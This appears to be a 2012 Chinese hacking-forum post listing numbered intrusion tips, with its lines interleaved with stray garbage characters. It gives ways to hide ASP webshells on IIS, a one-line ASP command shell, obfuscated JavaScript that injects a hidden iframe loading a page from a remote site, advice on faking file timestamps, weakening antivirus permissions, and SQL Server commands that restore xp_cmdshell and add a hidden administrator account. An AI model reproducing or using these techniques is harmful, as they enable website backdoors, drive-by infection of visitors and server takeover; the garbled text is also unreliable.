! @6 ~: i6 K+ F, c- ?* F; z用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。3 t4 m2 `7 |& J: L! l4 _4 s
* L# R3 N/ l4 d Q2 c
53、隐藏ASP后门的两种方法9 M2 e5 O. F+ \3 m+ a9 v2 r
1、建立非标准目录:mkdir images..\3 r# M9 @* j& q$ k6 N6 y
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp* |3 ?$ z$ N$ y
通过web访问ASP木马:http://ip/images../news.asp?action=login
$ l( s( ^- l* k( U% d如何删除非标准目录:rmdir images..\ /s
$ e3 n8 z: l/ |* I6 G' k2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:& ?( s+ t0 ~1 |% {, u+ v
mkdir programme.asp
1 d4 x' r" \# X" X2 s) m4 |新建1.txt文件内容:<!--#include file=”12.jpg”-->0 U& u. n1 Q/ P7 N' O1 h
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件0 K4 u" e2 _# w1 i& ]1 v
attrib +H +S programme.asp
; W2 U7 W- z3 n. o) }/ X通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt" d* A* K! `( B9 w- N
. _' @: F$ Q* A, P f3 v
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。* }) `/ V" K) ^2 ^8 s0 ~) O! C
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。9 K! Y5 R3 ^0 ^$ U }5 y; V
9 C* J' |$ ?: {: _55、JS隐蔽挂马$ T; |# ]( i& x, s9 T }$ w
1.2 \! Z8 D7 O# l
var tr4c3="<iframe src=ht";
5 D- s# l& g' _tr4c3 = tr4c3+"tp:/";
9 f, h, \5 i2 G) S( F# Xtr4c3 = tr4c3+"/ww";7 Y5 u) m8 O, [& ?
tr4c3 = tr4c3+"w.tr4";
# g- u$ w/ A. H; J7 `& X% xtr4c3 = tr4c3+"c3.com/inc/m";
: j8 x, `& \! [6 E4 [tr4c3 = tr4c3+"m.htm style="display:none"></i";* Y( H& Y5 n0 K; e
tr4c3 =tr4c3+"frame>'";
; d: n: C/ d: O5 W* j5 cdocument.write(tr4c3);
2 ]2 r7 N1 o- w- Y# u5 ^) n避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
) {$ r( S% D8 G: u3 v* ~5 @% Z2 j) W) ?1 s: c' S; x% G
2. A. O9 z. l( }1 y# ~6 `
转换进制,然后用EVAL执行。如# `3 k5 ^3 s9 t: D' P
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");8 W% l" j3 ~ T0 o8 i0 T
不过这个有点显眼。
" `( K( y \0 }$ a6 m8 y$ d4 ]: j3.' f$ A& j: J* ^) c( @& m B
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');8 t& t% ]3 c0 ^" n
最后一点,别忘了把文件的时间也修改下。
7 |* B. c- G$ S: D3 U# t- ^
! _& ^, y4 K" t( @56.3389终端入侵常用DOS命令
- D# z4 b/ g) d* D- H6 e6 u% btaskkill taskkill /PID 1248 /t: ]% m i! a- J: J. l
; k& P7 L4 B! A" f5 L
tasklist 查进程2 Q4 {' V/ i* P, ^2 t
& z7 J- `, b) ` r, k
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
9 {) e- |" e7 h$ t* hiisreset /reboot( d5 S* G# }; I9 _) F8 |
tsshutdn /reboot /delay:1 重起服务器& `* f$ k1 q( H2 `6 b
# [' B% @- @0 d7 X
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
# P* [! L O& i: ?( Y% Q& U) h" H4 f7 C$ {8 {0 k: r0 l) Z
query user 查看当前终端用户在线情况
0 V7 A9 K8 j; H8 ?& M5 p2 @( T _! k# p0 j/ m+ u/ B
要显示有关所有会话使用的进程的信息,请键入:query process */ H# N2 A# e' E. ~* V1 F2 _
) X# o4 @5 H9 ]7 y要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
: a9 p! U; F, w* }7 c0 a& B# _ R' \+ r' I
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
8 @5 ?: I5 H- ]7 \6 U) _6 F' u1 @4 W0 T1 U
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
9 d: k( h; I* ~4 \! G- d' ]1 \$ C7 X
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
+ m3 O \: Z# R9 U$ k$ Q& M+ L0 H8 ^7 B7 n
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
4 M6 ~& a2 n) ]% }1 \- o! K
0 j9 n! u6 p* Z3 Q, o4 r命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
% \3 x2 t! P; o E( b1 t; z+ r
7 l$ X+ P5 X5 O H" w命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
2 `- y' X- A* |8 E& W
( h1 t; Q" A3 Z3 z8 e56、在地址栏或按Ctrl+O,输入:
0 Q& B/ K" d) Z: O( v: a9 Z2 W) hjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;$ a# t7 a8 o: X2 S: p; B7 @
9 f" c3 W X' K2 {! U3 F
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。. e$ ~& A" V0 i5 F3 g2 \1 N
v* r* u7 J7 K' {4 v. ?' ?5 ]# h
57、net user的时候,是不能显示加$的用户,但是如果不处理的话, C& U2 ^& u0 h3 W0 S
用net localgroup administrators是可以看到管理组下,加了$的用户的。
5 t3 u3 u9 m5 [+ }3 G5 E% ]0 {1 t# A5 G0 a1 ]
58、 sa弱口令相关命令% I$ ~1 {8 x1 n/ h
+ H _4 z0 b5 }5 S$ v
一.更改sa口令方法:6 ?0 X; k/ ?- }
用sql综合利用工具连接后,执行命令:3 Z4 i4 i! d6 P5 d( i- Z: w
exec sp_password NULL,'20001001','sa'
# q5 | S7 {, a0 L4 ?(提示:慎用!)
4 k0 B" ^. @* F6 ^; m+ z- B* y q5 y1 w$ [: B1 V
二.简单修补sa弱口令.' ?/ t" E' G- p# d3 @& n% X
) L5 t* a/ u2 p3 }
方法1:查询分离器连接后执行:
$ `$ Q& {: [* j X: Qif exists (select * from4 x0 _1 u- w$ _
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and. W. L- d7 a$ D! F ?' X: T
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
' F& s, M% q e8 s4 S, @1 u, }8 m) u$ `. J* ]# s1 A+ H: u
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
G! Y0 {+ v* B" b" i! q9 X' S1 |4 Y6 d& z! ]) r* L% e: o2 h
GO
! X5 |5 r# r7 d! a0 j% L) g( J x7 @5 K0 @' S, C
然后按F5键命令执行完毕5 p, T' R. q& s3 v
+ r+ G& ?- k; o% U$ b/ G
方法2:查询分离器连接后, O" O, W' q" @, P2 U6 L: d
第一步执行:use master
& a: u: c- L0 [2 D& `- n; C第二步执行:sp_dropextendedproc 'xp_cmdshell'
2 N+ V' G5 [& I然后按F5键命令执行完毕
3 a+ `2 h: B1 ?' o: O. T# ?) K
. k: n# J7 c& D+ B
$ m' c1 N3 l$ V* M5 J0 D( O三.常见情况恢复执行xp_cmdshell.
% J# Q N' \0 \
1 t0 G1 m% }4 {, F% l+ u. m6 ]4 q& H* g
1 未能找到存储过程'master..xpcmdshell'.; o9 G% f# i1 f! z, N
恢复方法:查询分离器连接后,
3 ]; u3 q& f/ ]' D/ i9 [第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int- e+ E% f$ m3 m
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'. h3 q* s1 B3 d; ]/ o3 }% h& u
然后按F5键命令执行完毕
$ P- k. g6 X: [ b7 S# d6 w5 e! n: F- `, Q: H) e, T
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。). v# r6 {0 J9 D* u2 w; X8 J/ Q3 s, S5 [
恢复方法:查询分离器连接后,0 q7 e/ ^; e7 M: f# h- k
第一步执行:sp_dropextendedproc "xp_cmdshell"
4 o, f6 e, U, x第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'% F9 U. Y4 w; [* G0 c4 b% e
然后按F5键命令执行完毕" X$ L, @# U) W E! E+ E- a% G
- | B7 }, \6 i1 k1 c
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
' E7 A7 X2 H3 O% d! `" F恢复方法:查询分离器连接后,
3 r( i& o6 ~& A0 B# k% f第一步执行:exec sp_dropextendedproc 'xp_cmdshell'& h# y* f i6 E4 e& G
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
* P' r+ P3 ?6 D! ?5 @然后按F5键命令执行完毕
- g# i+ }4 K: Q! f
% B0 J' q+ t' ]6 i+ S9 `四.终极方法.
1 M; _& e `' j2 x0 o. s4 c如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:) J0 Z) q0 u0 s- p9 c: H6 O' |
查询分离器连接后, K% l. D! ?5 u4 X) y
2000servser系统:5 w) j( j R3 U, n
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
# z' [' i/ a9 q) o E1 V" C" _
5 c& v6 F5 ]& H" I0 [declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
+ d# n) [2 _5 ]% O- n! t0 w) Z; @- L2 o$ C
xp或2003server系统:
9 i0 x/ o* w9 r
( Q" g( T* N# G4 v9 p& \declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'. H" `& Q6 s/ b0 A% L' t1 m& K1 Q3 j- j
. _ E4 m2 L9 c" ~/ ]- tdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'1 R+ U3 u4 ~8 U
|
发表于 2012-9-15 14:51:03
收藏
支持
反对